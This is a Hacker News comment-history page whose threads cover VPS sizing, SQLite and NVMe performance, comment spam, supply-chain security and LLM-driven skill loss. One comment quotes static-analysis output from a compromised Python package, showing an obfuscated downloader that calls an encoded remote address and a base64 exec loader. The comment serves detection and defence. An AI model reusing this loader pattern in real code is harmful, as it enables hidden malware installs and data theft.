Hacker Newsnew | past | comments | ask | show | jobs | submit | f311a's commentslogin

This is a big problem for wordpress, but custom engines with a simple client-side checks (js based) get close to zero spam. All those spammers use technology fingerprinting services to obtain a list of blogs and they look for popular blog engines only.

They inject backlinks, SEO spam to advertise payday loans, online pharmacy, casino and so on. Just imagine you can get 30k of links to your website at once. Google will rank that page very high.

One pharmacy shop that sells generics or unlicensed casino can make tens of thousands of dollars per day. So even one week is enough to make a lot of money.


There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM. You can use it for caches or a database that supports concurrent writes. The $15 difference won’t make any financial difference if you are trying to run a small business.

Thinking about on how to fit everything on a $5 VPS does not help your business.


$15 is not exactly zero, is it? If you don't need more than 1GB, why pay anything for more than 1GB?

I recall running LAMP stacks on something like 128MB about 20 years ago and not really having problems with memory. Most current website backends are not really much more complicated than they were back then if you don't haul in bloat.


It is. With 10k MRR it represents 0.15% of the revenue. Having the whole backend costing that much for a company selling web apps is like it’s costing zero.


You probably don't make 10k MMR on day one. If you make many small apps, it can make sense to learn how to run things lean to have 4x longer runway per app.


The runway is going to be your time and attention span, not $10/mo.

I don't know what you value your time or opportunity cost as... but the $10/mo doesn't need to save very many minutes of your time deferring dealing with a resource constraint or add too much reliability to pay off.

If resource limitations end up upsetting one end user, that costs more than $10.


This assumes you have to spend any time or attention worrying. 1GB is plenty of memory for backend type stuff.

And most VPSs allow increasing memory with a click of a button and a reboot.


Overspending for the sake of overspending is not smart in life or business.


Saving 15 USD on 10k+ USD MMR is ridiculous.


Saving 15 USD on 0 USD MMR while still building the business is priceless. Virtually infinite runway.


Only if your time is worthless and someone else is paying your living expenses.


Given how much revenue depends on the experience of a web app and loading times, I’d be happy to pay 100$ a month on that revenue if I don’t have to sacrifice a second of additional loading time no matter how clever I was optimizing it.


That 1 second of loading time probably has more to do with heavy frontends and third-party scripts, than the backend server's capacity.

$100 is peanuts to most businesses, of course. But even so, I'd rather spend it on fixing an actual bottleneck.


Not all businesses depend on milliseconds being shaved off the loading times

For example: Ticketmaster makes a ton of money and their site is complete dogshit.


There’s a happy medium and $5 for 1GB RAM just isn’t it.


Be sure to inform the author of the article who is currently making money on his 1GB VPS that he hasn’t found a happy medium


Not a very strong argument now is it?


if the project already has positive revenue then arguably the ability to capture new users is worth a lot, which requires acceptable performance even when a big traffic surge is happening (like a HN hug of attention)

if the scalability is in the number of "zero cost" projects to start, then 5 vs 15 is a 3x factor.


NVME read latency is around 100usec, a SQLite3 database in the low terabytes needs somewhere between 3-5 random IOs per point lookup, so you're talking worst case for an already meaningful amount of data about 0.5ms per cold lookup. Say your app is complex and makes 10 of these per request, 5 ms. That leaves you serving 200 requests/sec before ever needing any kind of cache.

That's 17 million hits per day in about 3.9 MiB/sec sustained disk IO, before factoring in the parallelism that almost any bargain bucket NVME drive already offers (allowing you to at least 4x these numbers). But already you're talking about quadrupling the infrastructure spend before serving a single request, which is the entire point of the article.


You won't get such numbers on a $5 VPS, the SSDs that are used there are network attached and shared between users.


Not quite $5, but a $6.71 Hetzner VPS

    # ioping -R /dev/sda

    --- /dev/sda (block device 38.1 GiB) ioping statistics ---
    22.7 k requests completed in 2.96 s, 88.8 MiB read, 7.68 k iops, 30.0 MiB/s
    generated 22.7 k requests in 3.00 s, 88.8 MiB, 7.58 k iops, 29.6 MiB/s
    min/avg/max/mdev = 72.2 us / 130.2 us / 2.53 ms / 75.6 us


Rereading this, I have no idea where 3.9 MiB/sec came from, that 200 requests/sec would be closer to 8 MiB/sec


> There are zero reasons to limit yourself to 1GB of RAM

There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, and instead to focus on generating business value to customers and getting more paying customers. I think it’s what many engineers are keen to overlook behind fun technical details.


> There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, (...)

This is specious reasoning. You don't prevent anything by adding artificial constraints. To put things in perspective, Hetzner's cheapest vCPU plan comes with 4GB of RAM.


If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?


Why not a box with 128MB of RAM then?


Aside from the perfect solution fallacy, pragmatically it's because most operating systems require more than that to run. Debian's current recommended minimum is 512 MB, though they note that with swap enabled, as little as 350 MB is possible. If you wanted to run something more esoteric like Damn Small Linux, it's possible with as little as 64 MB last I checked.

In any case, this is for the OS itself - the webserver, application, database, etc. will all of course require their own. For a well-optimized program with a well-optimized schema, 1 GB is a reasonable lower bound.


Oh I'm well aware of the existence of operating systems that run in 32MB of RAM or less. So - why not? I think a well-optimised application server (especially one that uses SQLite as a datastore like the article proposes) can fit just fine in 128MB of RAM total, or 256MB if we're being generous. A whole gigabyte of memory seems rather extravagant, no? You could run half a dozen properly optimised apps on such a box.


> If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?

It is specious reasoning. Self-imposing arbitrary constraints don't make you write good, performant code. At most it makes your apps run slower because they will needlessly hit your self-impose arbitrary constraints.

If you put any value on performant code you just write performance-oriented code, regardless of your constraints. It's silly to pile on absurd constraints and expect performance to be an outcome. It's like going to the gym and work out with a hand tied behind your back, and expect this silly constraints to somehow improve the outcome of your workout. Complete nonsense.

And to drive the point home, this whole concern is even more perplexing as you are somehow targeting computational resources that fall below free tiers of some cloud providers. Sheer lunacy.


The gym analogy fails. Isolation exercises are almost exactly what you described. They target individual muscles to maximize hypertrophy, i.e. "improve the outcome of your workout."


Constraints provide feedback. Real-world example from my job: we have no real financial constraints for dev teams. If their poor schema or query design results in SLO breaches, and they opt to upsize their DB instead of spending the effort to fix the root problem, that is accepted. They have no incentive to do otherwise, because there are no constraints.

I think your analogy is flawed; a more apt one would be training with deliberately reduced oxygen levels, which trains your body to perform with fewer resources. Once you lift that constraint, you’ll perform better.

You’re correct that you can write performant code without being required to do so, but in practice, that is a rare trait.


I think we have to re-think and re-evaluate RAM usage on modern systems that use swapping with CPU-assisted page compression and fast, modern NVMe drives.

The Macbook Neo with 8GB RAM is a showcase of how people underistimated its capabilities due to low amount of RAM before launch, yet after release all the reviewers point to a larger set of capabilities without any issues that people didn't predict pre-launch.


$5 VPS disks are nowhere near macbooks, they are shared between users and often connected via network. They don't seat close to CPU.


Memory compression sounds like going back to DOS days. I think we're better off with writing tighter more performant code with no YAGNI. Alas, vibe coding will probably not get us there anytime soon.


Apple laptop CPUs have hardware memory compression and exceptionally high memory bandwidth for a CPU, and with their latest devices, very high storage bandwidth for a consumer SSD, so the equation is very different from the old DOS days.


Also, macOS is generally exceptional at caching and making efficient use of the fast solid state chips.


Or better yet, go with a euro provider like Hetzner and get 8GB of RAM for $10 or so. :)

Even their $5 plan gives 4GB.


I've been using Linode for years and just yday went to use Hetzner for a new VPS and they wanted my home address and passport. No thanks.


They also have servers in the US (east and west coast).


I don't think they offer their cheapest options (CX*) outside of Germany/Finland though. Singapore and USA are a bit pricier.


The reason would be YAGNI. Apparently 1GB doesn’t constitute an actual limit for OP’s use case. I’m sure he’ll upgrade if and when the need arises.


Hetzner, OVH and others offer 4-8gb and 2-4 cores for the same ~5$


While I agree that the $15 difference won’t make any financial difference, I look at the numbers from another angle. The main idea here, as per my understanding, is to reduce the hosting cost as much as possible.


It doesn't look like they think about how to make it fit though. They just use a known good go template


Where can you get 8GB for $20?


> There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM.

In my head, I call this the 'doubling algorithm'.

If there's anything that's both relatively cheap and useful, but where "more" (either in quality or quantity) has additional utility, 2x it.

Then 2x it again.

Repeat until either: the price change becomes noticeable or utility stops being gained.

Tl;dr -- saving order-of single dollars is rarely worth the tradeoffs.


> "There are zero reasons to limit yourself to 1GB of RAM"

> Immediately proposes alternative which is literally 4x the cost.


What are you using that utilizes Apple containers?


They did not even try to hide the payload that much.

Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.

  hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip  --min-confidence high  --exclude HX4000

  warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
  86:13
       │
  7783 │         except:
  7784 │             pass
  7785 │
  7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
       │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
  7787 │         with urllib.request.urlopen(r, timeout=15) as d:
  7788 │             with open(t, "wb") as f:
  7789 │                 f.write(d.read())
       │
       = Confidence: High
         Help: Data exfiltration is the unauthorized transfer of data from a computer.


  warning[HX4010]: Execution of obfuscated code.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
  10:9
       │
  7807 │       if os.name == 'nt':
  7808 │           return
  7809 │       try:
  7810 │ ╭         subprocess.Popen(
  7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
  7812 │ │             stdout=subprocess.DEVNULL,
  7813 │ │             stderr=subprocess.DEVNULL,
  7814 │ │             start_new_session=True
  7815 │ │         )
       │ ╰─────────^ HX4010
  7816 │       except:
  7817 │           pass
  7818 │
       │
       = Confidence: VeryHigh
         Help: Obfuscated code exec can be used to bypass detection.


Are there more tools like hexora?


GuardDog, but it's based on regexes


JQ is very convenient, even if your files are more than 100GB. I often need to extract one field from huge JSON line files, I just pipe jq to it to get results. It's slower, but implementing proper data processing will take more time.


More than 100GB can be 101GB, 500GB or 1TB+. I was speaking about 1TB+ files. I'm not sure you can get it faster unless you have a parallel processor.


Their previous release would be easily caught by static analysis. PTH is a novel technique.

Run all your new dependencies through static analysis and don't install the latest versions.

I implemented static analysis for Python that detects close to 90% of such injections.

https://github.com/rushter/hexora


Interesting tool, will definitely try - just curious, is there a tool (hexora checker) that ensures that hexora itself and its dependencies are not compromised ? And of course if there is one, I'll need another one for the hexora checker....


There is no such tool, but you can use other static analyzers. Datadog also has one, but it's not AST-based.



And easily bypassed by an attacker who knows about your static analysis tool who can iterate on their exploit until it no longer gets flagged.


the main things are:

1. pin dependencies with sha signatures 2. mirror your dependencies 3. only update when truly necessary 4. at first, run everything in a sandbox.


They actually did not add LinkedIn specifically. It's an AI translator that accepts anything in the `to` field.

https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text...


So I've seen. It's just the LinkedIn one is what they advertised. Speaks to the fact that it's probably some slopcoded thing, which I'd usually get mildly upset about but who can muster the effort in this economy. I think the point still stands though.


Why is this upvoted? The author did not even bother to read what he wrote.

> SOC 2 Type II ready

Huh? You vibecoded the repo in a week and claim it ready?


I meant since this is designed to be deployed in companies private VPC, their data stays with them. Zero vendor data risk. Corrected it. Thanks for pointing it out.


> I still understand how everything works,

That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

This reminds me of people who watch tens of video courses about programming, but can't code anything when it comes to a real job. They have an illusion of understanding how to code.

For AI companies, that's a good thing. People's skills can atrophy to the point that they can't code without LLMs.

I would suggest practicing it from time to time. It helps with code review and keeping the codebase at a decent level. We just can't afford to vibecode important software.

LLMs produce average code, and when you see it all day long, you get used to it. After getting used to it, you start to merge bad code because suddenly it looks good to you.


The GP seems to run a decentralized AI hosting company built on top of a crypto chain.

Can you get any fadd-ier than that? Of course they love AI.


I have a hard time using languages I know without an LSP when all ive been doing is using lsp and its suggestions.

I cant imagine how it is for people tha try to manually write after years of heavy llm usage


I disagree. I used to do a lot of math years ago. If you gave me some problems to do now I probably wouldn't be able to recall exactly how to solve them. But if you give me a written solution I will still be able to give you with 100% confidence a confirmation that it is correct.

This is what it means to understand something. It's like P Vs NP. I don't need to find the solution, I just need to be able to verify _a_ solution.


Well, I‘m still using my brain from morning to evening, but I‘m certainly using it differently.

This will without a doubt become a problem if the whole AI thing somehow collapses or becomes very expensive!

But it’s probably the correct adaptation if not.


> That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

YMMV, but I'm not seeing this at all. You might get foggy around things like the particular syntax for some advanced features, but I'll never forget what a for loop is, how binary search works, or how to analyze time complexity. That's just not how human cognition works, assuming you had solid understanding before.

I still do puzzles like Advent of Code or problems from competitive programming from time to time because I don't want to "lose it," but even if you're doing something interesting, a lot of practical programming boils down to the digital equivalent of "file this file into this filing," mind-numbingly boring, forgettable code that still has to be written to a reasonable standard of quality because otherwise everything collapses.


Want to try to do anything more complicated? I have seen a lot of delusional people around, who think their skills are still on the same level, but in interviews they bomb at even simple technical topics, when practical implementations are concerned.

If you don't code ofc you won't be as good at coding, that's a practical fact. Sure, beyond a certain skill level your decline may not be noticeable early because of the years of built-in practice and knowledge.

But considering every year there is so much more interesting technology if you don't keep improving in both hands-on learning and slow down to take stock, you won't be capable of anything more than delusional thinking about how awesome your skill level is.


Consider applying for YC's Summer 2026 batch! Applications are open till May 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: